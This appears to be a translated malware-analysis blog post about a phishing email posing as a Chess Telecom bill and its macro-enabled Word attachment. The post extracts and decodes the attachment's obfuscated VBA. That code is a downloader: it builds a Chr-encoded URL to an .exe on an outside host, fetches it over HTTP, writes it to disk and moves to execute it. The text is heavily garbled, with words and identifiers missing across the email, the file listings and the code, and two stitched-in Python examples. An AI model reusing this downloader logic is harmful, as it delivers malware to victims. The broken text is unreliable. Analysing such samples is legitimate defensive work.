1. A macro virus spread via email
A macro virus that has been circulating recently spreads via email. For one captured sample, the mail header is as follows:
The email body looks like this (to save space, the ellipsis stands for omitted content):
Your bill
: 24583
:
Bill date: July 2015
: £17.50
How can I view my bills?
Your Chess bill is ready and for you . To check out your deta=, bills and any you've since your last bill, just sign into My your sign in ?
If you've your sign in , no , you can reset these b=
is easy!
If you want to make a or debit card you can do by choosing
You don't need to do if you pay by debit, we will your on or after 30th June. If you pay by , details of how to pay us are on the .
to Debit today and you'll save at least £60.00 a year, simply call our team on 0844 770 6060.
else you'd like to know?
……
This e-mail has been sent from a to Chess , House, Heyes Lane, Edge, , SK9 7JP.
in , . Its are to the .
If you in error, Chess on
+44 (0)800 019 8900 the name of the , the
which it has been sent and then it; you may not rely on its nor copy/ it to .
, and
of in this email are those of the and will not bind Chess Telecom by an of this message.
We do not for ; you must scan for these.
sent to and from Chess are for , and , to and to and use of our .
Thank you for your co-.
are to terms and , VAT and are to .
E&OE
About the email body above: the text looks quite credible, the phone numbers in it are real, it gives a specific company name and address, and that company really does exist. Whether the company knows that someone is impersonating it is unknown (a bit of a mouthful, but not the point...). The reason the mail is so realistic is simply that the sender wants to lower the victim's guard.
2. Extracting the macro code
What we mainly analyze is the email's attachment. Using the save function, the attachment 2015-07-Bill.docm can be saved out of the message. The analysis needs a tool, which can be downloaded here.
The steps to extract the macro code are as follows:
2.1 Unpack
.exe 2015-07-Bill.docm
After unpacking, the contents are saved by default under C:~1~1~1Temp (WinXP SP3 environment); the unpacked directory looks roughly like this:
│ [].xml
│
├─
│ app.xml
│ core.xml
│
├─word
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .bin
│ │ .xml
│ │
│ ├─theme
│ │ .xml
│ │
│ └─_rels
│ .xml.rels
│ .bin.rels
│
└─_rels
In the document directory structure above you can see that the word directory contains a .bin file; this is where the macro code lives. Note that the name is arbitrary and is not necessarily the default macro file name. Next, extract the macro code from the .bin file.
2.2 Extract
.exe .bin info
By default a folder .BIN- is created in the same directory as the .bin file, containing the individual modules of the VBA macro code. The files extracted in this case are as follows:
The files above are all VB code, just with the file extension removed. The next job is to analyze the VB code and see exactly what it does.
3. Code analysis
For ease of explanation, the modules are not covered in their original order.
3.1 Code analysis
The code is as follows:
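The post's extraction tool is not named, so as an added example (my own code, not the post's tooling) the following Python locates the VBA part inside a .docm by its OOXML content type rather than by file name, which matters because, as noted above, the .bin can be renamed. The .docm bytes are constructed in memory with a deliberately renamed part; `word/invoice.bin` and the OLE2-magic-only payload are assumptions.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# OOXML content type that marks a package part as a VBA project, whatever it is named.
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"


def find_vba_parts(docm_bytes: bytes) -> list:
    """Return zip entry names that [Content_Types].xml declares as VBA projects."""
    with zipfile.ZipFile(io.BytesIO(docm_bytes)) as z:
        root = ET.fromstring(z.read("[Content_Types].xml"))
    return [
        el.get("PartName").lstrip("/")
        for el in root.iter(CT_NS + "Override")
        if el.get("ContentType") == VBA_CONTENT_TYPE
    ]


def extract_vba_parts(docm_bytes: bytes) -> dict:
    """Map each VBA part name to its raw OLE2 bytes, the input a VBA extractor wants."""
    with zipfile.ZipFile(io.BytesIO(docm_bytes)) as z:
        return {name: z.read(name) for name in find_vba_parts(docm_bytes)}


def build_sample_docm(vba_part: str = "word/invoice.bin") -> bytes:
    """Constructed sample: a minimal .docm-shaped zip whose VBA part is deliberately
    not called vbaProject.bin. The part body is just the OLE2 magic plus padding."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" '
        'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
        f'<Override PartName="/{vba_part}" ContentType="{VBA_CONTENT_TYPE}"/>'
        "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(vba_part, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in extract_vba_parts(build_sample_docm()).items():
        ole2 = blob[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
        print(f"{name}: {len(blob)} bytes, OLE2 header present: {ole2}")
```

The bytes returned for each part are what a VBA extractor (such as the one used in the post) takes as input.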
1 = ""
3 init
5 Set = Forms("main")
7 = .
8 = .
10 End
11 ( As )
12 = (((, Chr(60), ""), Chr(61), ""), Chr(59), "")
13 Set = ()
14 End
15 Sub
16 On Error GoTo
17
18 = .Value
19 = ""
20 DoCmd. ,
21
22 :
23 Exit Sub
24
25 :
26 Err.
27
28
29 End Sub
Focus on lines [11-14]:
( As )
= (((, Chr(60), ""), Chr(61), ""), Chr(59), "")
Set = ()
End
The key statement in the function is (((, Chr(60), ""), Chr(61), ""), Chr(59), ""). Chr(60), Chr(61) and Chr(59) are the characters "<", "=" and ";", so the three nested replacements simply delete every "<", "=" and ";" from the argument; this is the decoding routine that the obfuscated strings in the other modules are passed through before use.
3.2 Code analysis
The code is as follows:
6 If Me.boxes > 0 Or Me. > 0 Then
7 Me.total = ( * Me.boxes) + Me.
8 Else
9 Me.total = Me.
10 End If
11
12 End Sub
13
14 Sub
15 If Me.boxes > 0 Then
16 Me.total = * Me.boxes
17 End If
18 End Sub
19
20 ( As , )
21 Dim : Set = ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
22
23 With
24 .Type = 1
25 .Open
26 .write
27 End With
28 . , 2
29 End
30 Sub
31 If Me.boxes > 0 Or Me. > 0 Then
32 Me.total = ( * Me.boxes) + Me.
33 Else
34 Me.total = Me.
35 End If
36 End Sub
37
38 Sub
39 DoCmd.Save
40 End Sub
Focus on the code segment at lines [20-29]:
( As , )
Dim : Set = ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
With
.Type = 1
.Open
.write
End With
. , 2
End
("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
You can see that this uses the decoding function from the module analyzed above, and the obfuscated string is decoded before use. We already know what that function does, so decoding it by hand gives:
A<do;db=.St=r<ea;m
Removing the spaces, ";", "<" and "=" from it leaves the real name: Adodb.Stream. Further analysis shows that the function does the following:
It uses an ADODB stream to write a byte array to the specified file.
Later I will provide a script to decode these commands and recover the real commands in the macro code.
3.3 Module analysis
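The post promises a script for this; the following Python is an added example (my own, not the author's script) that does the two steps the post performs by hand: it evaluates the "..." & Chr(n) & ... concatenation as VBA would, then strips the same characters the macro's replace routine removes. It serves both this section and the download module in 3.3. The only things I introduce are the constructed SAMPLE_MODULE wrapper lines (objStream, objHttp, verb are hypothetical names); the three concatenations inside it are copied from the post's listings.

```python
import re

# Characters the macro's helper deletes with its three nested Replace calls:
# Chr(60) "<", Chr(61) "=" and Chr(59) ";" (the post notes spaces are dropped too).
JUNK_CHARS = "<=; "

# One token of a VBA concatenation: a Chr(n) call or a double-quoted literal.
_TOKEN_RE = re.compile(r'Chr\((\d+)\)|"([^"]*)"')
# Two or more such tokens joined by "&": the shape of every obfuscated string here.
_RUN_RE = re.compile(r'(?:Chr\(\d+\)|"[^"]*")(?:\s*&\s*(?:Chr\(\d+\)|"[^"]*"))+')


def normalise_quotes(text: str) -> str:
    """Blog copy-paste turns VBA's straight quotes into curly ones; undo that."""
    return text.replace("\u201c", '"').replace("\u201d", '"')


def eval_concat(expr: str) -> str:
    """Evaluate an expression made only of string literals and Chr(n) joined by &."""
    parts = []
    for m in _TOKEN_RE.finditer(normalise_quotes(expr)):
        code, literal = m.group(1), m.group(2)
        parts.append(chr(int(code)) if code is not None else literal)
    return "".join(parts)


def strip_junk(raw: str) -> str:
    """Mirror the macro's nested Replace calls: delete every junk character."""
    return "".join(ch for ch in raw if ch not in JUNK_CHARS)


def decode_module(vba_source: str) -> list:
    """Find every obfuscated concatenation in a module; return (raw, decoded) pairs."""
    out = []
    for m in _RUN_RE.finditer(normalise_quotes(vba_source)):
        raw = eval_concat(m.group(0))
        out.append((raw, strip_junk(raw)))
    return out


# Constructed sample module: the wrapper lines are hypothetical, the three
# concatenations are copied verbatim from the post's listings.
SAMPLE_MODULE = '''
Set objStream = CreateObject("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
Set objHttp = CreateObject("M" & "i" & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & "s" & Chr(111) & "f" & Chr(116) & ";" & Chr(46) & "X" & Chr(77) & Chr(60) & "L" & Chr(59) & Chr(72) & "T" & Chr(61) & Chr(84) & "P")
verb = Chr(71) & Chr(69) & Chr(84)
'''

if __name__ == "__main__":
    for raw, decoded in decode_module(SAMPLE_MODULE):
        print(f"{raw!r:40} -> {decoded}")
```

Running it over a whole extracted module lists every object name, HTTP verb and URL the macro builds at run time, without executing any of it.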
1 = ""
3 As
4 As
5 As
6 As ' query base
7 As ' form name
8 As ' text field for code entry
9 As ' text field for name entry
10 As
11 As
12 colS1 As ' to
13 colS2 As ' to
14
15
16
17 ' check form if they have user input
18 If Not (Forms().()) Then
19 = Forms().()
20 Else
21 = ""
22 End If
23
24 If Not (Forms().()) Then
25 = Forms().()
26 Else
27 = ""
28 End If
29
30 ' main logic
31 If ( = "" And = "") Or (() And ()) Then
32 =
33 (Not () = True) And (Not () = True) Then
34 = & " WHERE " & colS1 & " LIKE '" & & "*' AND " & colS2 & " LIKE '*" & & "*'"
35 Not () Then
36 = & " WHERE " & colS1 & " LIKE '" & & "*'"
37 Not () Then
38 = & " WHERE " & colS2 & " LIKE '*" & & "*'"
39 Else
40 " to "
41 Exit
42 End If
43
44 Forms(). =
45
46 End
47 ( As )
48
49 .().Left = 720
50
51 End
52
53 Sub
54
55 = Chr(104) & Chr(116) & Chr(61) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(59) & Chr(47) & Chr(108) & Chr(97) & Chr(98) & Chr(111) & "a" & Chr(60) & Chr(117) & "d" & Chr(105) & Chr(111) & Chr(46) & Chr(61) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(52) & Chr(116) & Chr(102) & Chr(51) & Chr(51) & Chr(119) & Chr(47) & Chr(60) & Chr(119) & Chr(52) & Chr(116) & Chr(52) & Chr(53) & Chr(51) & Chr(46) & Chr(59) & "e" & Chr(61) & Chr(120) & Chr(101)
' download method: = .
56 Set = ("M" & "i" & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & "s" & Chr(111) & "f" & Chr(116) & ";" & Chr(46) & "X" & Chr(77) & Chr(60) & "L" & Chr(59) & Chr(72) & "T" & Chr(61) & Chr(84) & "P")
57
58 = (((, Chr(60), ""), Chr(61), ""), Chr(59), "")
' use it to download: . Open
59 , Chr(79) & Chr(112) & Chr(101) & Chr(110), , Chr(71) & Chr(69) & Chr(84), _
60 _
61 , False
62
' = .Shell
63 Set = (Chr(87) & "
———END———